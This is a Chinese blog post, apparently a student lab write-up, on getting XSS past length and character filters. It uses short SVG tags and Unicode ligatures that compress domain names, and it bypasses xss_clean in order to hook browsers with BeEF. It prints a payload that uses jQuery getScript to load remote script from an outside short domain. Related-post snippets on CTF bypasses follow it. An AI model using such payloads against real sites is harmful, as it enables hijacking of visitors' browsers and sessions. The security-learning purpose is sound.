限制字符绕过【含beef安装】

已于 2022-08-16 13:39:52 修改
阅读量283 收藏 1
点赞数
文章标签: 前端 javascript 开发语言
于 2022-07-26 17:29:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Miracle_ze/article/details/125980422
版权

字符短域名绕过

一、绕过方法

1.1 重写,使用短标签

<svg/onload = ‘’ >
<script/ src = ’ ’ >

1.2 Unicode中多字符表示单字符

以下特殊字符会被html识别为单个字符

  • ff expands to ff
  • ℠ expands to sm
  • ㏛ expands to sr
  • st expands to st
  • ㎭ expands to rad
  • ℡ expands to tel

1.3 实体编码html

二、限制长度短字符短域名绕过

2.1 xss_clean 过滤语句

在这里插入图片描述

使用beef工具开始尝试xss注入,首先使用基础语句实现弹窗<script>alert(1)</script>
在这里插入图片描述
添加结果:
在这里插入图片描述
在这里插入图片描述

由上图可见 被xss_clean过滤了注入失败。
为此我们删除xss_clean 来测试是否因为它而被过滤
在这里插入图片描述
结果表示xss_clean造成被过滤原因就是xss_clean
值得注意的是在当前xss_clean版本忽略了svg,为此我们可以使用svg注入
在这里插入图片描述

在这里插入图片描述
再次刷新页面同样显示
在这里插入图片描述

2.2

在观察前端引用文件时发现使用了jQuery
在这里插入图片描述
因此可以使用<svg/onload=$.getScript(‘℡㏛.co’)>注入,使用老师的telsr.co的域,是缩短了的即为5个字符。但是这个网站是老师提供的外网,我没有vpn因此选择了自己的。因此修改里字符限制长度
在这里插入图片描述

在这里插入图片描述
成功获取获取,在beef查看。
在这里插入图片描述
beef获取成功成功绕过。

三、kali的beef安装

beef安装

Miracle_ze
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20210221CTF小记之bugkuCTF冬至红包(短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制
qq_45290991的博客
02-22 2181
今天做了一道很恶心的题目,话不多说,先上结果图: 我们先来分析代码: 当没有用GET方法传入flag时,会显示Click here的链接。 点击链接会用GET方法传入一串字符串$exam,后面是当前时间的一串sha1哈希值。 判断传入的flag长度与$exam是否相同,不同则显示 长度不允许 第二个判断过滤了一大堆 第三个判断传入flag的值等于flag值的哈希值,正确就输出flag。用的是严格的三个等号的比较,我们flag都不知道,哈希值更不可能知道了,== 但容易发现此处存在任意代码.
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
牛肉安装机 该脚本可自动从GitHub安装BeEF(浏览器利用框架)。要使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef...
SQL 取空格右边的字符_SQL注入绕过与防御(Web漏洞及防御)
weixin_39715907的博客
11-16 241
SQL注入绕过大小写绕过根据应用程序的过滤规则,通常会对恶意关键字设置黑名单,如果存在恶意关键字,应用程序就会退出运行。但在过滤规则中可能存在过滤不完整或只过滤小写或大小的情况,没有针对大小写组合进行过滤,导致可以通过大小写混写来绕过关键字过滤!aNd 1=1 ......orDer ByseLeCt......双写关键字绕过id =1 and 1=1加入and被过滤了,最后变成了id =1 1=...
看不见的Unicode码让敏感词轻松逃过审核,谷歌IBM都中招
量子位
08-11 408
丰色 发自 凹非寺量子位 报道 | 公众号 QbitAIUnicode码作为全世界文字的统一编码,使用范围广,用它去对NLP模型做对抗攻击,可谓中招一大片。就比如下面这个谷歌翻译:文字部分...
某校园内网渗透测试
qq_28624871的博客
05-10 3628
信息收集   一、基础信息 目标系统是windows, 服务层有IIs6.0,Apache-Web-Server, 支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6   二、端口开放情况: 利用goby对ip进行扫描,使用nmap工具也同样能扫出所有开放的端口   三、资产探测: 结合goby和nmap扫描的端口情况,手工探测了下,发现总共有5个web应用,以及开放了MySQL、RDP服务。 端口 应用 运行环境 备注 501 WEB:xxxxxxx网络课
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 5897
文件上传的番外,一句话木马绕过思路,第二版整理,还是会根据做题经验增补的~
beef插件翻译.docx
12-09
Beef 插件翻译文档 Beef 插件是一个功能强大且广泛使用的渗透测试工具,它提供了多种模块来实现不同的攻击和信息收集任务。下面是 Beef 插件翻译文档中的知识点总结: 1. Module Tree(模块树): Module Tree 是...
vasp.5.4.4&beef-src.tar.xz
03-20
1 编译和安装BEEF $ cd libbeef $ chmod +x configure $ ./configure CC=mpicc --prefix=/opt/software/beef $ make $ make install 2 修改VASP makefile.include makefile.include需要稍作修改(CPP_OPTIONS...
docker-beef:BeEF(浏览器开发框架)构建的 Dockerfile
06-20
码头牛肉BeEF 的 Dockerfile(浏览器开发框架) 拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏绝对令人满足! 注意力! 这种绑定仍在开发中。 可能会发生错误。 二进制文件已从存储库中删除。 ...
[红明谷CTF 2021]write_shell php短标签绕过
scrawman的博客
11-28 3513
[红明谷CTF 2021]write_shell 考的是php里的绕过,因为正则过滤了php ; ~ eval等字符,所以php标签<?php?>写入不了 https://xz.aliyun.com/t/8107#toc-11这个文章讲绕过讲的挺详细的 对于这道题目可以用<?= ?>代替php标签。<?= ?>短标签会直接把php的结果输出,<? ?>的功能则和<?php?>完全一样。过滤空格可以用\t绕过,或者%09也是tab的URL编码。php
命令执行中对字符长度限制绕过解析
weixin_59419135的博客
02-14 1164
命令执行中对字符长度限制绕过解析,对限制长度为7,5,4的字符过滤进行绕过
ZTJL1
qq_75005708的博客
10-05 184
查看PHP回到页面访问php,访问结果如下前面还比较好理解给出用户名和密码,但是后面就出现一个函数,我们应该要绕过它,接着往下看一下,它需要admin=admin,然后就passwd=wllm,如果可以满足这个条件,就可以拿到flag了,现在关键的问题就是我们要绕过函数。__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行程序调用反序列化方法时,会自动执行__weakup()函数payloads:4:"wllm";
BugkuCTF-字符?正则?,各种绕过,细心,urldecode二次编码绕过
veinard_F的博客
05-04 1542
字符?正则? 打开题目后出现一段代码 大致分析会发现需找到一个id满足前面的匹配才可以输出$key,即flag,本题主要考察有关正则表达式的内容。 “/key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/i” 分析上述代码,首先需要一个key,而 . 表示匹配一个除换行符以外的所有字符,可以任意选择,比如a; * 表示匹配前面一个字符大于等于0次,为了简便选...
【文件包漏洞03】文件包漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5118
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包漏洞空字符绕过的方法。 4. 掌握文件包漏洞的六种利用方式。...
php rce和绕过
m0_73973498的博客
10-08 2459
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
PHP短标签、双写绕过
最新发布
2401_82985722的博客
03-19 241
文件中包了PHP代码,但是在上下文中不被允许。(后端利用正则限制匹配PHP,php)上传的文件类型不是有效的 JPEG 图片格式。短标签会直接把php的结果输出,原来的路径中存在php。用pphpph双写绕过。·这都不做(web)(此题免杀马不可用)连接蚁剑,得flag。
Web中常见的绕过和技巧
devil8123665的博客
10-15 1100
参考文献Web中常见的绕过和技巧 - mrhonest - 博客园 SQL注入 十六进制绕过引号 slect table_name from information_schema.table where table_schema="sqli"; slect table_name from information_schema.table where table_schema=0x73716c69; slect table_name from information_.
【安全】P 4-19 unicode绕过过滤触发XSS
Z_David_Z的博客
02-20 168
目录0X01 unicode介绍0X02 XSS挖掘0X03 双斜杠+unicode绕过0X04 Payload触发XSS 0X01 unicode介绍 Unicode(统一码、万国码、单一码)是计算机科学领域里的一项业界标准,包括字符集、编码方案等。Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。 使用python将字符转换为unicode类型 0X02 XSS挖掘 构造无害独一字符串,在响
kali beef安装
07-25
要在Kali Linux上安装BeEF(Browser Exploitation Framework),您可以按照以下步骤进行操作: 1. 打开终端并更新系统: ``` sudo apt update sudo apt upgrade ``` 2. 安装Ruby开发环境: ``` sudo apt ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值